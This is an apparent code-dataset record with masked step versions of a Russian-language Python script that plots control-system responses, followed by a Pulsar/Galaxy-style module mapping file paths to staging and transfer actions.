{ "blob_id": "c08e6cee61e9f32a9f067a9554c74bb2ddbd7cf3", "index": 2288, "step-1": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\n<mask token>\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-3": "<mask token>\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-4": "import control.matlab as ctrl\nimport matplotlib.pylab as plt\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range(1, 3000):\n TimeLine.append(i / 1000)\n plt.figure(0, figsize=[7, 6])\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, 'r', label='Исходная')\n plt.plot(x21, y21, 'b', label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\nif func_number == 1:\n process_data([4.0], [1.0], [2.0], [1.0])\nelif func_number == 2:\n process_data([3.0], [2, 1.0], [1.5, 0.0], [4, 1.0])\nelif func_number == 3:\n process_data([1.0], [1, 0.0], [1.0], [0.5, 0.0])\nelif func_number == 4:\n process_data([5, 0.0], [1e-12, 1.0], [10, 0.0], [1e-12, 1.0])\nelif func_number == 5:\n process_data([3.0], [1, 1.0], [1.5, 0.0], [2, 1.0])\n", "step-5": "import control.matlab as ctrl\nimport matplotlib.pylab as plt\n\n\ndef process_data(num11, den11, num21, den21):\n w11 = ctrl.tf(num11, den11)\n w21 = ctrl.tf(num21, den21)\n print('результат w11={} w21={}'.format(w11, w21))\n TimeLine = []\n for i in range (1, 3000):\n TimeLine.append(i/1000)\n plt.figure(0, figsize = [7, 6])\n\n [y11, x11] = ctrl.step(w11, TimeLine)\n [y21, x21] = ctrl.step(w21, TimeLine)\n plt.plot(x11, y11, \"r\", label='Исходная')\n plt.plot(x21, y21, \"b\", label='Увеличенная k и уменшенная Т')\n plt.title('Переходная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n\n [y11, x11] = ctrl.impulse(w11, TimeLine)\n [y21, x21] = ctrl.impulse(w21, TimeLine)\n plt.plot(x11, y11, \"r\", label='Исходная')\n plt.plot(x21, y21, \"b\", label='Увеличенная k и уменшенная Т')\n plt.title('Импульсная функция звена')\n plt.ylabel('Амплитуда')\n plt.xlabel('Время(с)')\n plt.grid(True)\n plt.show()\n\n ctrl.mag, ctrl.phase, ctrl.omega = ctrl.bode(w11, w21, dB=False)\n plt.plot()\n plt.show()\n return w11, w21\n\n\nprint('1 - безынерционное звено')\nprint('2 - апериодическое звено')\nprint('3 - интегрирующее звено')\nprint('4 - идеальное дифференцирующее звено')\nprint('5 - реально дифференцирующее звено')\nprint('Введите номер функции, которую необходимо отобразить:')\nfunc_number = int(input())\n\nif func_number == 1:\n process_data([4.], [ 1.], [2.], [ 1.])\n\nelif func_number == 2:\n process_data([3.], [2, 1.], [1.5, 0.], [4, 1.])\n\nelif func_number == 3:\n process_data([1.], [1, 0.], [1.], [0.5, 0.])\n\nelif func_number == 4:\n process_data([5, 0.], [1e-12, 1.], [10, 0.], [1e-12, 1.])\n\nelif func_number == 5:\n process_data([3.], [1, 1.], [1.5, 0.], [2, 1.])\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import fnmatch import tempfile from contextlib import contextmanager from os import ( makedirs, unlink, ) from os.path import ( abspath, basename, dirname, exists, join, sep, ) from re import ( compile, escape, ) from typing import ( Any, Dict, List, Type, ) from urllib.parse import urlencode from galaxy.util.bunch import Bunch from .config_util import read_file from .transport import ( get_file, post_file, rsync_get_file, rsync_post_file, scp_get_file, scp_post_file, ) from .util import ( copy_to_path, directory_files, unique_path_prefix, ) DEFAULT_MAPPED_ACTION = 'transfer' # Not really clear to me what this should be, exception? DEFAULT_PATH_MAPPER_TYPE = 'prefix' STAGING_ACTION_REMOTE = "remote" STAGING_ACTION_LOCAL = "local" STAGING_ACTION_NONE = None STAGING_ACTION_DEFAULT = "default" # Poor man's enum. path_type = Bunch( # Galaxy input datasets and extra files. INPUT="input", # Galaxy config and param files. CONFIG="config", # Files from tool's tool_dir (for now just wrapper if available). TOOL="tool", # Input tool work dir files - e.g. task-split input file WORKDIR="workdir", # Job directory files (e.g. tool standard input/output and containerized command). JOBDIR="jobdir", # Input metadata dir files - e.g. metadata files, etc.. METADATA="metadata", # Galaxy output datasets in their final home. OUTPUT="output", # Galaxy from_work_dir output paths and other files (e.g. galaxy.json) OUTPUT_WORKDIR="output_workdir", # Meta job and data files (e.g. Galaxy metadata generation files and # metric instrumentation files) OUTPUT_METADATA="output_metadata", # Job directory files output. OUTPUT_JOBDIR="output_jobdir", # Other fixed tool parameter paths (likely coming from tool data, but not # necessarily). UNSTRUCTURED="unstructured", ) ACTION_DEFAULT_PATH_TYPES = [ path_type.INPUT, path_type.CONFIG, path_type.TOOL, path_type.WORKDIR, path_type.JOBDIR, path_type.METADATA, path_type.OUTPUT, path_type.OUTPUT_WORKDIR, path_type.OUTPUT_METADATA, path_type.OUTPUT_JOBDIR, ] ALL_PATH_TYPES = ACTION_DEFAULT_PATH_TYPES + [path_type.UNSTRUCTURED] MISSING_FILES_ENDPOINT_ERROR = "Attempted to use remote_transfer action without defining a files_endpoint." MISSING_SSH_KEY_ERROR = "Attempt to use file transfer action requiring an SSH key without specifying a ssh_key." class FileActionMapper: """ Objects of this class define how paths are mapped to actions. >>> json_string = r'''{"paths": [ \ {"path": "/opt/galaxy", "action": "none"}, \ {"path": "/galaxy/data", "action": "transfer"}, \ {"path": "/cool/bamfiles/**/*.bam", "action": "copy", "match_type": "glob"}, \ {"path": ".*/dataset_\\\\d+.dat", "action": "copy", "match_type": "regex"} \ ]}''' >>> from tempfile import NamedTemporaryFile >>> from os import unlink >>> def mapper_for(default_action, config_contents): ... f = NamedTemporaryFile(delete=False) ... f.write(config_contents.encode('UTF-8')) ... f.close() ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None) ... mapper = FileActionMapper(mock_client) ... as_dict = config=mapper.to_dict() ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works ... unlink(f.name) ... return mapper >>> mapper = mapper_for(default_action='none', config_contents=json_string) >>> # Test first config line above, implicit path prefix mapper >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input') >>> action.action_type == u'none' True >>> action.staging_needed False >>> # Test another (2nd) mapper, this one with a different action >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input') >>> action.action_type == u'transfer' True >>> action.staging_needed True >>> # Always at least copy work_dir outputs. >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir') >>> action.action_type == u'copy' True >>> action.staging_needed True >>> # Test glob mapper (matching test) >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy' True >>> # Test glob mapper (non-matching test) >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none' True >>> # Regex mapper test. >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy' True >>> # Doesn't map unstructured paths by default >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none' True >>> input_only_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"path": "/", "action": "transfer", "path_types": "input"} \ ] }''') >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer' True >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none' True >>> unstructured_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"path": "/", "action": "transfer", "path_types": "*any*"} \ ] }''') >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer' True >>> match_type_only_mapper = mapper_for(default_action="none", config_contents=r'''{"paths": [ \ {"action": "transfer", "path_types": "input"}, \ {"action": "remote_copy", "path_types": "output"} \ ] }''') >>> input_action = match_type_only_mapper.action({}, 'input') >>> input_action.action_type 'transfer' >>> output_action = match_type_only_mapper.action({}, 'output') >>> output_action.action_type 'remote_copy' """ def __init__(self, client=None, config=None): if config is None and client is None: message = "FileActionMapper must be constructed from either a client or a config dictionary." raise Exception(message) if config is None: config = self.__client_to_config(client) self.default_action = config.get("default_action", "transfer") self.ssh_key = config.get("ssh_key", None) self.ssh_user = config.get("ssh_user", None) self.ssh_host = config.get("ssh_host", None) self.ssh_port = config.get("ssh_port", None) self.mappers = mappers_from_dicts(config.get("paths", [])) self.files_endpoint = config.get("files_endpoint", None) def action(self, source, type, mapper=None): path = source.get("path", None) mapper = self.__find_mapper(path, type, mapper) action_class = self.__action_class(path, type, mapper) file_lister = DEFAULT_FILE_LISTER action_kwds = {} if mapper: file_lister = mapper.file_lister action_kwds = mapper.action_kwds action = action_class(source, file_lister=file_lister, **action_kwds) self.__process_action(action, type) return action def unstructured_mappers(self): """ Return mappers that will map 'unstructured' files (i.e. go beyond mapping inputs, outputs, and config files). """ return filter(lambda m: path_type.UNSTRUCTURED in m.path_types, self.mappers) def to_dict(self): return dict( default_action=self.default_action, files_endpoint=self.files_endpoint, ssh_key=self.ssh_key, ssh_user=self.ssh_user, ssh_port=self.ssh_port, ssh_host=self.ssh_host, paths=list(map(lambda m: m.to_dict(), self.mappers)) ) def __client_to_config(self, client): action_config_path = client.action_config_path if action_config_path: config = read_file(action_config_path) else: config = getattr(client, "file_actions", {}) config["default_action"] = client.default_file_action config["files_endpoint"] = client.files_endpoint for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']: if hasattr(client, attr): config[attr] = getattr(client, attr) return config def __find_mapper(self, path, type, mapper=None): if not mapper: if path is not None: normalized_path = abspath(path) else: normalized_path = None for query_mapper in self.mappers: if query_mapper.matches(normalized_path, type): mapper = query_mapper break return mapper def __action_class(self, path, type, mapper): action_type = self.default_action if type in ACTION_DEFAULT_PATH_TYPES else "none" if mapper: action_type = mapper.action_type if type in ["workdir", "jobdir", "output_workdir", "output_metadata", "output_jobdir"] and action_type == "none": # We are changing the working_directory/job_directory relative to what # Galaxy would use, these need to be copied over. action_type = "copy" action_class = actions.get(action_type, None) if action_class is None: message_template = "Unknown action_type encountered %s while trying to map path %s" message_args = (action_type, path) raise Exception(message_template % message_args) return action_class def __process_action(self, action, file_type): """ Extension point to populate extra action information after an action has been created. """ if getattr(action, "inject_url", False): self.__inject_url(action, file_type) if getattr(action, "inject_ssh_properties", False): self.__inject_ssh_properties(action) def __inject_url(self, action, file_type): url_base = self.files_endpoint if not url_base: raise Exception(MISSING_FILES_ENDPOINT_ERROR) if "?" not in url_base: url_base = "%s?" % url_base else: url_base = "%s&" % url_base url_params = urlencode({"path": action.path, "file_type": file_type}) action.url = f"{url_base}{url_params}" def __inject_ssh_properties(self, action): for attr in ["ssh_key", "ssh_host", "ssh_port", "ssh_user"]: action_attr = getattr(action, attr) if action_attr == UNSET_ACTION_KWD: client_default_attr = getattr(self, attr, None) setattr(action, attr, client_default_attr) if action.ssh_key is None: raise Exception(MISSING_SSH_KEY_ERROR) REQUIRED_ACTION_KWD = object() UNSET_ACTION_KWD = "__UNSET__" class BaseAction: whole_directory_transfer_supported = False action_spec: Dict[str, Any] = {} action_type: str def __init__(self, source, file_lister=None): self.source = source self.file_lister = file_lister or DEFAULT_FILE_LISTER @property def path(self): return self.source.get("path") def unstructured_map(self, path_helper): unstructured_map = self.file_lister.unstructured_map(self.path) if self.staging_needed: # To ensure uniqueness, prepend unique prefix to each name prefix = unique_path_prefix(self.path) for path, name in unstructured_map.items(): unstructured_map[path] = join(prefix, name) else: path_rewrites = {} for path in unstructured_map: rewrite = self.path_rewrite(path_helper, path) if rewrite: path_rewrites[path] = rewrite unstructured_map = path_rewrites return unstructured_map @property def staging_needed(self): return self.staging != STAGING_ACTION_NONE @property def staging_action_local(self): return self.staging == STAGING_ACTION_LOCAL def _extend_base_dict(self, **kwds): base_dict = dict( path=self.path, # For older Pulsar servers (pre-0.13.0?) source=self.source, action_type=self.action_type, ) base_dict.update(**kwds) return base_dict def to_dict(self): return self._extend_base_dict() def __str__(self): as_dict = self.to_dict() attribute_str = "" first = True for key, value in as_dict.items(): if key == "source": continue if first: first = False else: attribute_str += "," attribute_str += "{}={}".format(key, value) return "FileAction[%s]" % attribute_str class NoneAction(BaseAction): """ This action indicates the corresponding path does not require any additional action. This should indicate paths that are available both on the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same paths. """ action_type = "none" staging = STAGING_ACTION_NONE def to_dict(self): return self._extend_base_dict() @classmethod def from_dict(cls, action_dict): return NoneAction(source=action_dict["source"]) def path_rewrite(self, path_helper, path=None): return None class RewriteAction(BaseAction): """ This actin indicates the Pulsar server should simply rewrite the path to the specified file. """ action_spec = dict( source_directory=REQUIRED_ACTION_KWD, destination_directory=REQUIRED_ACTION_KWD ) action_type = "rewrite" staging = STAGING_ACTION_NONE def __init__(self, source, file_lister=None, source_directory=None, destination_directory=None): super().__init__(source, file_lister=file_lister) self.source_directory = source_directory self.destination_directory = destination_directory def to_dict(self): return self._extend_base_dict( source_directory=self.source_directory, destination_directory=self.destination_directory, ) @classmethod def from_dict(cls, action_dict): return RewriteAction( source=action_dict["source"], source_directory=action_dict["source_directory"], destination_directory=action_dict["destination_directory"], ) def path_rewrite(self, path_helper, path=None): if not path: path = self.path new_path = path_helper.from_posix_with_new_base(self.path, self.source_directory, self.destination_directory) return None if new_path == self.path else new_path class TransferAction(BaseAction): """ This actions indicates that the Pulsar client should initiate an HTTP transfer of the corresponding path to the remote Pulsar server before launching the job. """ action_type = "transfer" staging = STAGING_ACTION_LOCAL class CopyAction(BaseAction): """ This action indicates that the Pulsar client should execute a file system copy of the corresponding path to the Pulsar staging directory prior to launching the corresponding job. """ action_type = "copy" staging = STAGING_ACTION_LOCAL class RemoteCopyAction(BaseAction): """ This action indicates the Pulsar server should copy the file before execution via direct file system copy. This is like a CopyAction, but it indicates the action should occur on the Pulsar server instead of on the client. """ action_type = "remote_copy" staging = STAGING_ACTION_REMOTE @classmethod def from_dict(cls, action_dict): return RemoteCopyAction(source=action_dict["source"]) def write_to_path(self, path): copy_to_path(open(self.path, "rb"), path) def write_from_path(self, pulsar_path): destination = self.path parent_directory = dirname(destination) if not exists(parent_directory): makedirs(parent_directory) with open(pulsar_path, "rb") as f: copy_to_path(f, destination) class RemoteTransferAction(BaseAction): """ This action indicates the Pulsar server should transfer the file before execution via one of the remote transfer implementations. This is like a TransferAction, but it indicates the action requires network access to the staging server, and should be executed via ssh/rsync/etc """ inject_url = True action_type = "remote_transfer" staging = STAGING_ACTION_REMOTE def __init__(self, source, file_lister=None, url=None): super().__init__(source, file_lister=file_lister) self.url = url def to_dict(self): return self._extend_base_dict(url=self.url) @classmethod def from_dict(cls, action_dict): return RemoteTransferAction(source=action_dict["source"], url=action_dict["url"]) def write_to_path(self, path): get_file(self.url, path) def write_from_path(self, pulsar_path): post_file(self.url, pulsar_path) class RemoteObjectStoreCopyAction(BaseAction): """ """ action_type = "remote_object_store_copy" staging = STAGING_ACTION_REMOTE inject_object_store = True @classmethod def from_dict(cls, action_dict): return RemoteObjectStoreCopyAction(source=action_dict["source"]) def write_to_path(self, path): assert self.object_store # Make sure object_store attribute injected assert "object_store_ref" in self.source object_store_ref = self.source["object_store_ref"] dataset_object = Bunch( id=object_store_ref["dataset_id"], uuid=object_store_ref["dataset_uuid"], object_store_id=object_store_ref["object_store_id"], ) filename = self.object_store.get_filename(dataset_object) copy_to_path(open(filename, 'rb'), path) def write_from_path(self, pulsar_path): raise NotImplementedError("Writing raw files to object store not supported at this time.") class PubkeyAuthenticatedTransferAction(BaseAction): """Base class for file transfers requiring an SSH public/private key """ inject_ssh_properties = True action_spec = dict( ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD, ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ) staging = STAGING_ACTION_REMOTE def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD, ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=UNSET_ACTION_KWD): super().__init__(source, file_lister=file_lister) self.ssh_user = ssh_user self.ssh_host = ssh_host self.ssh_port = ssh_port self.ssh_key = ssh_key def to_dict(self): return self._extend_base_dict( ssh_user=self.ssh_user, ssh_host=self.ssh_host, ssh_port=self.ssh_port ) @contextmanager def _serialized_key(self): key_file = self.__serialize_ssh_key() yield key_file self.__cleanup_ssh_key(key_file) def __serialize_ssh_key(self): f = tempfile.NamedTemporaryFile(delete=False) if self.ssh_key is not None: f.write(self.ssh_key.encode("utf-8")) else: raise Exception("SSH_KEY not available") return f.name def __cleanup_ssh_key(self, keyfile): if exists(keyfile): unlink(keyfile) class RsyncTransferAction(PubkeyAuthenticatedTransferAction): action_type = "remote_rsync_transfer" @classmethod def from_dict(cls, action_dict): return RsyncTransferAction(source=action_dict["source"], ssh_user=action_dict["ssh_user"], ssh_host=action_dict["ssh_host"], ssh_port=action_dict["ssh_port"], ssh_key=action_dict["ssh_key"]) def write_to_path(self, path): with self._serialized_key() as key_file: rsync_get_file(self.path, path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) def write_from_path(self, pulsar_path): with self._serialized_key() as key_file: rsync_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) class ScpTransferAction(PubkeyAuthenticatedTransferAction): action_type = "remote_scp_transfer" @classmethod def from_dict(cls, action_dict): return ScpTransferAction(source=action_dict["source"], ssh_user=action_dict["ssh_user"], ssh_host=action_dict["ssh_host"], ssh_port=action_dict["ssh_port"], ssh_key=action_dict["ssh_key"]) def write_to_path(self, path): with self._serialized_key() as key_file: scp_get_file(self.path, path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) def write_from_path(self, pulsar_path): with self._serialized_key() as key_file: scp_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) class MessageAction: """ Sort of pseudo action describing "files" store in memory and transferred via message (HTTP, Python-call, MQ, etc...) """ action_type = "message" staging = STAGING_ACTION_DEFAULT def __init__(self, contents, client=None): self.contents = contents self.client = client @property def staging_needed(self): return True @property def staging_action_local(self): # Ekkk, cannot be called if created through from_dict. # Shouldn't be a problem the way it is used - but is an # object design problem. return self.client.prefer_local_staging def to_dict(self): return dict(contents=self.contents, action_type=MessageAction.action_type) @classmethod def from_dict(cls, action_dict): return MessageAction(contents=action_dict["contents"]) def write_to_path(self, path): open(path, "w").write(self.contents) DICTIFIABLE_ACTION_CLASSES = [ RemoteCopyAction, RemoteTransferAction, MessageAction, RsyncTransferAction, ScpTransferAction, RemoteObjectStoreCopyAction ] def from_dict(action_dict): action_type = action_dict.get("action_type", None) target_class = None for action_class in DICTIFIABLE_ACTION_CLASSES: if action_type == action_class.action_type: target_class = action_class if not target_class: message = "Failed to recover action from dictionary - invalid action type specified %s." % action_type raise Exception(message) if "source" in action_dict: action_dict.pop("path") # remove redundant information stored for backward compatibility. elif "path" in action_dict: # legacy message received from older Pulsar client, pop the path from the dict # and convert it to a source. source = {"path": action_dict.pop("path")} action_dict["source"] = source return target_class.from_dict(action_dict) class BasePathMapper: match_type: str def __init__(self, config): action_type = config.get('action', DEFAULT_MAPPED_ACTION) action_class = actions.get(action_type, None) action_kwds = action_class.action_spec.copy() for key, value in action_kwds.items(): if key in config: action_kwds[key] = config[key] elif value is REQUIRED_ACTION_KWD: message_template = "action_type %s requires key word argument %s" message = message_template % (action_type, key) raise Exception(message) else: action_kwds[key] = value self.action_type = action_type self.action_kwds = action_kwds path_types_str = config.get('path_types', "*defaults*") path_types_str = path_types_str.replace("*defaults*", ",".join(ACTION_DEFAULT_PATH_TYPES)) path_types_str = path_types_str.replace("*any*", ",".join(ALL_PATH_TYPES)) self.path_types = path_types_str.split(",") self.file_lister = FileLister(config) def matches(self, path, path_type): path_type_matches = path_type in self.path_types rval = path_type_matches and self._path_matches(path) return rval def _extend_base_dict(self, **kwds): base_dict = dict( action=self.action_type, path_types=",".join(self.path_types), match_type=self.match_type ) base_dict.update(self.file_lister.to_dict()) base_dict.update(self.action_kwds) base_dict.update(**kwds) return base_dict def to_pattern(self): raise NotImplementedError() class PathTypeOnlyMapper(BasePathMapper): match_type = 'path_type_only' def __init__(self, config): super().__init__(config) def _path_matches(self, path): return True def to_dict(self): return self._extend_base_dict() class PrefixPathMapper(BasePathMapper): match_type = 'prefix' def __init__(self, config): super().__init__(config) self.prefix_path = abspath(config['path']) def _path_matches(self, path): return path is not None and path.startswith(self.prefix_path) def to_pattern(self): pattern_str = r"({}{}[^\s,\"\']+)".format(escape(self.prefix_path), escape(sep)) return compile(pattern_str) def to_dict(self): return self._extend_base_dict(path=self.prefix_path) class GlobPathMapper(BasePathMapper): match_type = 'glob' def __init__(self, config): super().__init__(config) self.glob_path = config['path'] def _path_matches(self, path): return path is not None and fnmatch.fnmatch(path, self.glob_path) def to_pattern(self): return compile(fnmatch.translate(self.glob_path)) def to_dict(self): return self._extend_base_dict(path=self.glob_path) class RegexPathMapper(BasePathMapper): match_type = 'regex' def __init__(self, config): super().__init__(config) self.pattern_raw = config['path'] self.pattern = compile(self.pattern_raw) def _path_matches(self, path): return path is not None and self.pattern.match(path) is not None def to_pattern(self): return self.pattern def to_dict(self): return self._extend_base_dict(path=self.pattern_raw) MAPPER_CLASSES = [PathTypeOnlyMapper, PrefixPathMapper, GlobPathMapper, RegexPathMapper] MAPPER_CLASS_DICT = dict(map(lambda c: (c.match_type, c), MAPPER_CLASSES)) def mappers_from_dicts(mapper_def_list): return list(map(lambda m: _mappper_from_dict(m), mapper_def_list)) def _mappper_from_dict(mapper_dict): if "path" in mapper_dict: map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE) else: map_type = 'path_type_only' return MAPPER_CLASS_DICT[map_type](mapper_dict) class FileLister: def __init__(self, config): self.depth = int(config.get("depth", "0")) def to_dict(self): return dict( depth=self.depth ) def unstructured_map(self, path): depth = self.depth if self.depth == 0: return {path: basename(path)} else: while depth > 0: path = dirname(path) depth -= 1 return {join(path, f): f for f in directory_files(path)} DEFAULT_FILE_LISTER = FileLister(dict(depth=0)) ACTION_CLASSES: List[Type[BaseAction]] = [ NoneAction, RewriteAction, TransferAction, CopyAction, RemoteCopyAction, RemoteTransferAction, RemoteObjectStoreCopyAction, RsyncTransferAction, ScpTransferAction, ] actions = {clazz.action_type: clazz for clazz in ACTION_CLASSES} __all__ = ( 'FileActionMapper', 'path_type', 'from_dict', 'MessageAction', 'RemoteTransferAction', # For testing )
normal
{ "blob_id": "1a5c189b9a2bed35fbbb7df40ec80a1d02402d7f", "index": 6860, "step-1": "<mask token>\n\n\nclass TransferAction(BaseAction):\n <mask token>\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the 